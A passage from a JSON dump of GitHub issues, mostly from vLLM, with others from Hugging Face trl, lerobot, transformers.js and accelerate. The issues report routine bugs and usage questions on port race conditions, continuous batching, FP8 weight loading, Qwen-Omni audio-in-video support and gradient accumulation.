pid=670293)[0;0m ^^^^^^^^^^^^^^^^\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/utils/__init__.py\", line 2983, in make_zmq_socket\n[1;36m(APIServer pid=670293)[0;0m socket.bind(path)\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/zmq/sugar/socket.py\", line 320, in bind\n[1;36m(APIServer pid=670293)[0;0m super().bind(addr)\n[1;36m(APIServer pid=670293)[0;0m File \"zmq/backend/cython/_zmq.py\", line 1009, in zmq.backend.cython._zmq.Socket.bind\n[1;36m(APIServer pid=670293)[0;0m File \"zmq/backend/cython/_zmq.py\", line 190, in zmq.backend.cython._zmq._check_rc\n[1;36m(APIServer pid=670293)[0;0m zmq.error.ZMQError: Address already in use (addr='tcp://slurm-h200-206-017:59251')\n```\n\n### \ud83d\udc1b Describe the bug\n\nFrom Nick:\n```\nI think the problem is that each DP worker finds/assigns free ports dynamically/independently.. so there is a race condtion. I'm not sure of an immediate workaround apart from just re-attempt to start things when this happens. We'll have to look at how to catch and re-find a port if possible (though I have a memory this might be nontrivial).\n```\n\nFrom Reporter:\n```\nReceived init message: EngineHandshakeMetadata(addresses=EngineZmqAddresses(inputs=['tcp://slurm-h200-207-083:60613'], outputs=['tcp://slurm-h200-207-083:36865'], coordinator_input='tcp://slurm-h200-207-083:34575', coordinator_output='tcp://slurm-h200-207-083:48025', frontend_stats_publish_address='ipc:///tmp/88ec875f-3de9-46ec-9947-6d1d6573b910'), parallel_config={'data_parallel_master_ip': 'slurm-h200-207-083', 'data_parallel_master_port': 41917, '_data_parallel_master_port_list': [60545, 36835, 47971, 37001], 'data_parallel_size': 32})\n```\n\nI'm looking at the code and I see that all code paths for getting ports eventually to go to _get_open_port, and that in _get_open_port there is basically no defence against choosing the same port twice. Can you please confirm my understanding?\n\n_get_open_port in main is here: https://github.com/vllm-project/vllm/blob/main/vllm/utils/network_utils.py#L177\n\nUPD: I imagine the assumption here is that once a code path gets a port, that code path will use it immediately, and thus the port will be come busy. It doesn't seem to hold though.\n\n\nEven where all sockets that vLLM chose for itself are unique, I get the stack trace below.\nI have the following explanation in mind:\n\n- vLLM chooses zmq ports before launching the engines\n- launching the engines takes ~5 mins\n- by the time the engines are launched, something can listen on this port, like for example Ray\n- **It looks the right solution is to hold on to then chosen ports immediately are they are chosen.**\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28498", "state": "open", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-11-11T22:51:35Z", "updated_at": "2025-12-04T07:35:31Z", "comments": 13, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 28489, "title": "[Usage]: Online continuous batching", "body": "### Current environment\n\n```\n==============================\n System Info\n==============================\nOS : macOS 26.1 (arm64)\nGCC version : Could not collect\nClang version : 17.0.0 (clang-1700.4.4.1)\nCMake version : Could not collect\nLibc version : N/A\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0\nIs debug build : False\nCUDA used to build PyTorch : None\nROCM used to build PyTorch : N/A\n==============================\n Python Environment\n==============================\nPython version : 3.12.6 (v3.12.6:a4a2d2b0d85, Sep 6 2024, 16:08:03) [Clang 13.0.0 (clang-1300.0.29.30)] (64-bit runtime)\nPython platform : macOS-26.1-arm64-arm-64bit\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : False\nCUDA runtime version : No CUDA\nCUDA_MODULE_LOADING set to : N/A\nGPU models and configuration : No CUDA\nNvidia driver version : No CUDA\ncuDNN version : No CUDA\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n==============================\n CPU Info\n==============================\nApple M2\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.6\n[pip3] nvidia-ml-py==13.580.82\n[pip3] pyzmq==27.0.0\n[pip3] sentence-transformers==5.1.2\n[pip3] spacy-transformers==1.3.9\n[pip3] torch==2.8.0\n[pip3] torchaudio==2.8.0\n[pip3] torchvision==0.23.0\n[pip3] transformers==4.57.1\n[conda] Could not collect\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.0\nvLLM Build Flags:\n CUDA Archs: Not Set; ROCm: Disabled\nGPU Topology:\n Could not collect\n==============================\n Environment Variables\n==============================\nPYTORCH_NVML_BASED_CUDA_CHECK=1\nTORCHINDUCTOR_COMPILE_THREADS=1\n\n```\n\nHello,\n\nI am looking to run an LLM (using vLLM) within a FastAPI application. My goal is to achieve online, continuous batching.\n\nI want the application to continuously receive requests from external clients, and have vLLM automatically batch them up for parallel inference.\n\nIn the past, I used the LLM() engine wrapped in RayServe. While this worked, it seemed to create a new internal deployment each time, which I want to avoid.\n\nI am now trying to achieve this without RayServe, using the AsyncLLMEngine directly (don't know If I need the async, read online).\n\nHere is an example of my current code. I'm running for test purposes on a cpu, but I have another issue on GPU (very long inference time, like minutes, with Ray, only 2-3 seconds).\n\n```\n# Model:\nengine_args = AsyncEngineArgs(\n model=path,\n tensor_parallel_size=1,\n gpu_memory_utilization=0.7,\n enforce_eager=False,\n disable_custom_all_reduce=False,\n max_model_len=2048,\n trust_remote_code=True,\n enable_log_requests=False,\n max_num_seqs=10\n )\n\nmodel_ = AsyncLLMEngine.from_engine_args(engine_args)\n\n# Params\nsampling_params = SamplingParams(\n n=1,\n best_of=None,\n presence_penalty=0.0,\n frequency_penalty=0.0,\n temperature=0,\n top_p=1.0,\n top_k=1,\n stop=my_stop_token,\n stop_token_ids=[my_eos_token_id],\n ignore_eos=False,\n max_tokens=2048,\n logprobs=None,\n skip_special_tokens=True\n )\n\noutputs_generator = model_.generate(prompt, sampling_params, request_id)\n\nfinal_output = None\nasync for request_output in outputs_generator:\n if request_output.finished:\n final_output = request_output\n break\n\nif final_output and final_output.outputs:\n result = final_output.outputs[0].text\n```\n\nIn my local test, I got the error when I try as example 3 inferences, calling 3 times self.model.generate() with 1 inputs and not 1 time self.model.generate() with 3 inputs.\nError: `Assertion failed: !_current_out (src/router.cpp:166)`\n\nIs it possible to achieve what I'm asking by always calling a generate() for internal batching, or the solution it's only by \"collecting\" the prompts with a management and then calling a centralized generate()?\nThanks\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28489", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-11T20:51:58Z", "updated_at": "2025-11-11T20:53:47Z", "comments": 0, "user": "GenVr" }, { "repo": "huggingface/trl", "number": 4507, "title": "Can a multimodal model like Gemma be trained in the same way as a text-only model like Qwen, but with the goal of improving only its text capabilities?", "body": "As stated in the title, I hope to improve only the text capabilities of Gemma 3, but it doesn\u2019t seem to have worked as expected. The model I used is gemma-3-4b-it, and I conducted the following simple tests:\n```python\n dataset = Dataset.from_list(\n [\n {\"prompt\": \"What is 2+2?\", \"task\": \"math\"},\n {\"prompt\": \"Write a function that returns the sum of two numbers.\", \"task\": \"code\"},\n {\"prompt\": \"What is 3*4?\", \"task\": \"math\"},\n {\"prompt\": \"Write a function that returns the product of two numbers.\", \"task\": \"code\"},\n ]\n )\n```\nThese data shouldn\u2019t cause Gemma to generate excessively long responses, but according to the logs, its output length is quite large: ```'completions/mean_length': 4096.0, 'completions/min_length': 4096.0, 'completions/max_length': 4096```\nThis doesn\u2019t seem normal.\n", "url": "https://github.com/huggingface/trl/issues/4507", "state": "open", "labels": [ "\ud83d\udc1b bug", "\u23f3 needs more info" ], "created_at": "2025-11-11T15:59:51Z", "updated_at": "2025-11-21T05:58:50Z", "comments": 0, "user": "Tuziking" }, { "repo": "vllm-project/vllm", "number": 28472, "title": "[Usage]: Will the reasoning_content in the chat template still be applied correctly after switching reasoning_content to reasoning", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nWill the message.reasoning_content for (which exists in default chat_template for qwen3-next-thinking qwen3-vl-thinking or other qwen3-thinking series or glm4.5 or kimi-k2-thinking or other models) in the chat template still be applied correctly after changing reasoning_content to reasoning (apply reasoning on ai message to reasoning_content on chat template)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28472", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-11T15:04:11Z", "updated_at": "2025-11-13T06:25:29Z", "comments": 4, "user": "zhcn000000" }, { "repo": "vllm-project/vllm", "number": 28456, "title": "[Usage]: benchmark_moe Usage", "body": "### Your current environment\n\n```text\n(EngineCore_DP0 pid=7498) INFO 11-10 11:42:48 [shm_broadcast.py:466] No available shared memory broadcast block found in 60 seconds. This typically happens when some processes are hanging or doing some time-consuming work (e.g. compilation).\n(APIServer pid=7416) INFO 11-10 11:42:50 [loggers.py:127] Engine 000: Avg prompt throughput: 104162.6 tokens/s, Avg generation throughput: 10.0tokens/s, Running: 100 reqs, Waiting: 0 reqs, GPU KV cache usage: 10.1%, Prefix cache hit rate: 98.6%\n(APIServer pid=7416) INFO 11-10 11:43:00 [loggers.py:127] Engine 000: Avg prompt throughput: 0.0 tokens/s, Avg generation throughput: 0.0 tokens/s, Running: 100 reqs, Waiting: 0 reqs, GPU KV cache usage: 10.1%, Prefix cache hit rate: 98.6%\n(APIServer pid=7416) INFO 11-10 11:43:20 [loggers.py:127] Engine 000: Avg prompt throughput: 5.1 tokens/s, Avg generation throughput: 0.1 tokens/s, Running: 1 reqs, Waiting: 0 reqs, GPU KV cache usage: 0.1%, Prefix cache hit rate: 98.6%\n\n\n\n\nCollecting environment information...==============================\n System Info==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)GCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collectCMake version : version 3.28.3\nLibc version : glibc-2.39\n============================== PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128Is debug build : False\nCUDA used to build PyTorch : 12.8ROCM used to build PyTorch : N/A\n==============================\n Python Environment==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)Python platform : Linux-6.8.0-85-generic-x86_64-with-glibc2.39\n\n============================== CUDA / GPU Info\n==============================Is CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: Tesla V100-PCIE-16GB\nGPU 1: Tesla V100-PCIE-16GB\n\nNvidia driver version : 570.195.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 43 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 24\nOn-line CPU(s) list: 0-23\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7402P 24-Core Processor\nCPU family: 23\nModel: 49\nThread(s) per core: 1\nCore(s) per socket: 24\nSocket(s): 1\nStepping: 0\nFrequency boost: disabled\nCPU(s) scaling MHz: 74%\nCPU max MHz: 2800.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 5599.64\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sev sev_es\nVirtualization: AMD-V\nL1d cache: 768 KiB (24 instances)\nL1i cache: 768 KiB (24 instances)\nL2 cache: 12 MiB (24 instances)\nL3 cache: 1", "url": "https://github.com/vllm-project/vllm/issues/28456", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-11T09:22:33Z", "updated_at": "2025-11-21T01:43:41Z", "comments": 6, "user": "ekmekovski" }, { "repo": "huggingface/lerobot", "number": 2422, "title": "Running inference on Libero with pi0", "body": "Hello, I am trying to run inference with pi0 but the commands referenced in this issue #683 are outdated I believe. What would the commands be to run inference in Lerobot, and also running inference with pi0 in Libero? Additionally, if there is any documentation for these commands in general for fine-tuning and eval, that would be great!", "url": "https://github.com/huggingface/lerobot/issues/2422", "state": "open", "labels": [ "question", "policies", "evaluation" ], "created_at": "2025-11-11T09:22:25Z", "updated_at": "2025-11-19T16:53:27Z", "user": "thomasdeng2027" }, { "repo": "huggingface/lerobot", "number": 2421, "title": "Seeking assistance with tactile data acquisition", "body": "I want to simultaneously collect tactile and visual data, with tactile data sampled at 150 fps and visual data at 30 fps. Each time an image frame is saved, I also want to store all tactile data collected during that time interval as additional features associated with the image.\n\nWhat would be the best approach to implement this? Which parts of the source code should I modify?", "url": "https://github.com/huggingface/lerobot/issues/2421", "state": "open", "labels": [ "question" ], "created_at": "2025-11-11T02:49:57Z", "updated_at": "2025-11-19T16:53:05Z", "user": "zhoushaoxiang" }, { "repo": "vllm-project/vllm", "number": 28438, "title": "[Usage]: How do I install vLLM nightly?", "body": "### Your current environment\n\nThe output of collect_env.py\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 20.04.5 LTS (x86_64)\nGCC version : (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\nClang version : Could not collect\nCMake version : version 3.16.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.5.1+cu121\nIs debug build : False\nCUDA used to build PyTorch : 12.1\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.18 (main, Jun 5 2025, 13:14:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.4.250-2-velinux1u1-amd64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.4.131\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA A100-SXM4-80GB\nGPU 1: NVIDIA A100-SXM4-80GB\nGPU 2: NVIDIA A100-SXM4-80GB\nGPU 3: NVIDIA A100-SXM4-80GB\nGPU 4: NVIDIA A100-SXM4-80GB\nGPU 5: NVIDIA A100-SXM4-80GB\nGPU 6: NVIDIA A100-SXM4-80GB\nGPU 7: NVIDIA A100-SXM4-80GB\n\nNvidia driver version : 535.129.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.7.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nAddress sizes: 46 bits physical, 57 bits virtual\nCPU(s): 112\nOn-line CPU(s) list: 0-108\nOff-line CPU(s) list: 109-111\nThread(s) per core: 1\nCore(s) per socket: 28\nSocket(s): 2\nNUMA node(s): 2\nVendor ID: GenuineIntel\nCPU family: 6\nModel: 106\nModel name: Intel(R) Xeon(R) Platinum 8336C CPU @ 2.30GHz\nStepping: 6\nCPU MHz: 2294.608\nBogoMIPS: 4589.21\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 1.3 MiB\nL1i cache: 896 KiB\nL2 cache: 35 MiB\nL3 cache: 54 MiB\nNUMA node0 CPU(s): 0-55\nNUMA node1 CPU(s): 56-111\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves wbnoinvd arat avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq av", "url": "https://github.com/vllm-project/vllm/issues/28438", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-11T02:24:47Z", "updated_at": "2025-11-12T01:54:42Z", "comments": 2, "user": "LittleLucifer1" }, { "repo": "vllm-project/vllm", "number": 28425, "title": "[Feature][RL]: Fix Fp8 Weight Loading for RL", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nFeedback from RL community that vLLM weight loading in fp8 is bad for RL\n- https://vllm-dev.slack.com/archives/C07UUL8E61Z/p1762811441757529\n\nThe cause is clear: in [fp8.py](https://github.com/vllm-project/vllm/blob/bf6a3d0ff5a69e0a30567f2ad417530c002eaa4e/vllm/model_executor/layers/quantization/fp8.py#L490) in process_weights_after_loading there is a lot of parameter wrapping that drops .weight_loader attribute. \n\nThere's a patch from the Moonshot team that fixes this issue and there's a [PR](https://github.com/vllm-project/vllm/pull/24488) with this patch that never got any comments. The [patch](https://github.com/MoonshotAI/checkpoint-engine/blob/main/patches/vllm_fp8.patch) only works on top of v0.10.2rc1. Shortly after that tag, this [PR](https://github.com/vllm-project/vllm/pull/23280) made fp8 weight updates even trickier by transposing weight_inv_scale parameter for CUTLASS. \n\nI don't know how to patch any vLLM version after this PR to be able to call model.load_weights after the engine has started. It is a bummer, because DeepSeek wide EP inference is quite a bit faster in v0.11.0.\n\nWe need to fix this ASAP\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28425", "state": "open", "labels": [ "feature request" ], "created_at": "2025-11-10T21:59:02Z", "updated_at": "2025-11-10T23:25:37Z", "comments": 1, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/transformers.js", "number": 1450, "title": "SmolVLM2 500M Video Instruct - Video inference", "body": "### Question\n\nHey, is it possible to setup **video** inference through **transformers.js** (may be somehow else?) for the model SmolVLM2 500M Video Instruct? I can't make it work, but I saw, that it is possible in py transformers.\n\nI want to create something similar to https://huggingface.co/spaces/HuggingFaceTB/SmolVLM2-HighlightGenerator/tree/main but with full local WebGPU inference.\n\nThanks in advance. cc: @xenova ", "url": "https://github.com/huggingface/transformers.js/issues/1450", "state": "open", "labels": [ "question" ], "created_at": "2025-11-10T19:51:07Z", "updated_at": "2025-11-12T07:46:32Z", "user": "youchi1" }, { "repo": "vllm-project/vllm", "number": 28409, "title": "[Usage]: There is any performance benchmark between running vLLM server via docker image and python?", "body": "### Your current environment\n\n```text\n\nI mean, if I run a service with the vLLM docker image, it has any performance upgrade if comparing with running it as a python service (e.g., importing vllm package, setting up vllm inference, handling payload/responses, etc)?\n\n```\n\n\n### How would you like to use vllm\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28409", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-10T17:56:14Z", "updated_at": "2025-11-10T17:56:14Z", "comments": 0, "user": "rafaelsandroni" }, { "repo": "vllm-project/vllm", "number": 28393, "title": "[Feature]: Does vllm-jax plan to support GPU acceleration?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nDoes vllm-jax plan to support GPU acceleration?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28393", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-11-10T12:28:20Z", "updated_at": "2025-11-10T21:44:57Z", "comments": 2, "user": "south-ocean" }, { "repo": "vllm-project/vllm", "number": 28388, "title": "[Bug]: \u65b0\u7248\u7684vllm\u5df2\u7ecf\u5e9f\u5f03\u4e86v0\u4ee3\u7801\uff0c\u800c\u5bf9qwen-omni\u7cfb\u5217\u7684\u6a21\u578b\u652f\u6301\u4ec5\u9650\u4e8ev0\uff0c\u4f3c\u4e4e\u662f\u56e0\u4e3a\u8fd9\u4e2a\u539f\u56e0\uff0c\u6211\u4eec\u65e0\u6cd5\u4f7f\u7528\u6700\u65b0\u7248\u7684vllm\u63a8\u7406qwen-omni\u6a21\u578b", "body": "### Your current environment\n\nName: vllm\nVersion: 0.10.2\n\n### \ud83d\udc1b Describe the bug\n\n\u4e0b\u9762\u7684\u5b98\u65b9\u6837\u4f8b\u4ee3\u7801\u4f3c\u4e4e\u662f\u65e0\u6cd5\u8fd0\u884c\u7684\uff0c\u4f1a\u5bf9\u5176\u4e2d\u7684\u97f3\u9891\u4f7f\u7528\u53c2\u6570\n\"mm_processor_kwargs\": {\n \"use_audio_in_video\": True,\n },\n\u8fdb\u884c\u62a5\u9519\uff1a\n```python\n# SPDX-License-Identifier: Apache-2.0\n# SPDX-FileCopyrightText: Copyright contributors to the vLLM project\n\"\"\"\nThis example shows how to use vLLM for running offline inference\nwith the correct prompt format on Qwen2.5-Omni (thinker only).\n\"\"\"\n\nfrom typing import NamedTuple\n\nimport vllm.envs as envs\nfrom vllm import LLM, SamplingParams\nfrom vllm.assets.audio import AudioAsset\nfrom vllm.assets.image import ImageAsset\nfrom vllm.assets.video import VideoAsset\nfrom vllm.multimodal.image import convert_image_mode\nfrom vllm.utils import FlexibleArgumentParser\n\n\nclass QueryResult(NamedTuple):\n inputs: dict\n limit_mm_per_prompt: dict[str, int]\n\n\n# NOTE: The default `max_num_seqs` and `max_model_len` may result in OOM on\n# lower-end GPUs.\n# Unless specified, these settings have been tested to work on a single L4.\n\ndefault_system = (\n \"You are Qwen, a virtual human developed by the Qwen Team, Alibaba \"\n \"Group, capable of perceiving auditory and visual inputs, as well as \"\n \"generating text and speech.\"\n)\n\n\ndef get_mixed_modalities_query() -> QueryResult:\n question = (\n \"What is recited in the audio? \"\n \"What is the content of this image? Why is this video funny?\"\n )\n prompt = (\n f\"<|im_start|>system\\n{default_system}<|im_end|>\\n\"\n \"<|im_start|>user\\n<|audio_bos|><|AUDIO|><|audio_eos|>\"\n \"<|vision_bos|><|IMAGE|><|vision_eos|>\"\n \"<|vision_bos|><|VIDEO|><|vision_eos|>\"\n f\"{question}<|im_end|>\\n\"\n f\"<|im_start|>assistant\\n\"\n )\n return QueryResult(\n inputs={\n \"prompt\": prompt,\n \"multi_modal_data\": {\n \"audio\": AudioAsset(\"mary_had_lamb\").audio_and_sample_rate,\n \"image\": convert_image_mode(\n ImageAsset(\"cherry_blossom\").pil_image, \"RGB\"\n ),\n \"video\": VideoAsset(name=\"baby_reading\", num_frames=16).np_ndarrays,\n },\n },\n limit_mm_per_prompt={\"audio\": 1, \"image\": 1, \"video\": 1},\n )\n\n\ndef get_use_audio_in_video_query() -> QueryResult:\n question = (\n \"Describe the content of the video, then convert what the baby say into text.\"\n )\n prompt = (\n f\"<|im_start|>system\\n{default_system}<|im_end|>\\n\"\n \"<|im_start|>user\\n<|vision_bos|><|VIDEO|><|vision_eos|>\"\n f\"{question}<|im_end|>\\n\"\n f\"<|im_start|>assistant\\n\"\n )\n asset = VideoAsset(name=\"baby_reading\", num_frames=16)\n audio = asset.get_audio(sampling_rate=16000)\n assert not envs.VLLM_USE_V1, (\n \"V1 does not support use_audio_in_video. \"\n \"Please launch this example with \"\n \"`VLLM_USE_V1=0`.\"\n )\n return QueryResult(\n inputs={\n \"prompt\": prompt,\n \"multi_modal_data\": {\n \"video\": asset.np_ndarrays,\n \"audio\": audio,\n },\n \"mm_processor_kwargs\": {\n \"use_audio_in_video\": True,\n },\n },\n limit_mm_per_prompt={\"audio\": 1, \"video\": 1},\n )\n\n\ndef get_multi_audios_query() -> QueryResult:\n question = \"Are these two audio clips the same?\"\n prompt = (\n f\"<|im_start|>system\\n{default_system}<|im_end|>\\n\"\n \"<|im_start|>user\\n<|audio_bos|><|AUDIO|><|audio_eos|>\"\n \"<|audio_bos|><|AUDIO|><|audio_eos|>\"\n f\"{question}<|im_end|>\\n\"\n f\"<|im_start|>assistant\\n\"\n )\n return QueryResult(\n inputs={\n \"prompt\": prompt,\n \"multi_modal_data\": {\n \"audio\": [\n AudioAsset(\"winning_call\").audio_and_sample_rate,\n AudioAsset(\"mary_had_lamb\").audio_and_sample_rate,\n ],\n },\n },\n limit_mm_per_prompt={\n \"audio\": 2,\n },\n )\n\n\nquery_map = {\n \"mixed_modalities\": get_mixed_modalities_query,\n \"use_audio_in_video\": get_use_audio_in_video_query,\n \"multi_audios\": get_multi_audios_query,\n}\n\n\ndef main(args):\n model_name = \"Qwen/Qwen2.5-Omni-7B\"\n query_result = query_map[args.query_type]()\n\n llm = LLM(\n model=model_name,\n max_model_len=5632,\n max_num_seqs=5,\n limit_mm_per_prompt=query_result.limit_mm_per_prompt,\n seed=args.seed,\n )\n\n # We set temperature to 0.2 so that outputs can be different\n # even when all prompts are identical when running batch inference.\n sampling_params = SamplingParams(temperature=0.2, max_tokens=64)\n\n outputs = llm.generate(query_result.inputs, sampling_params=sampling_params)\n\n for o in outputs:\n generated_text = o.outputs[0].text\n print(generated_text)\n\n\ndef parse_args():\n parser = FlexibleArgumentParser(\n description=\"Demo on using vLLM for offline inference with \"\n \"audio language models\"\n )\n ", "url": "https://github.com/vllm-project/vllm/issues/28388", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-10T09:23:33Z", "updated_at": "2025-11-16T05:51:42Z", "comments": 1, "user": "Lee-xeo" }, { "repo": "huggingface/accelerate", "number": 3836, "title": "When using gradient accumulation, does the order of optimizer.zero_grad() affect training?", "body": "if I use accelerate+deepspeed to train a model, and I set \n`deepspeed_config:\n gradient_accumulation_steps: 8\n offload_optimizer_device: cpu\n offload_param_device: cpu\n zero3_init_flag: false\n zero_stage: 2`\n\ndoes the order of the order of backward(), step(), zero_grad() affect training?\nFor example:\n`for batch in training_dataloader:\n with accelerator.accumulate(model):\n inputs, targets = batch\n outputs = model(inputs)\n loss = loss_function(outputs, 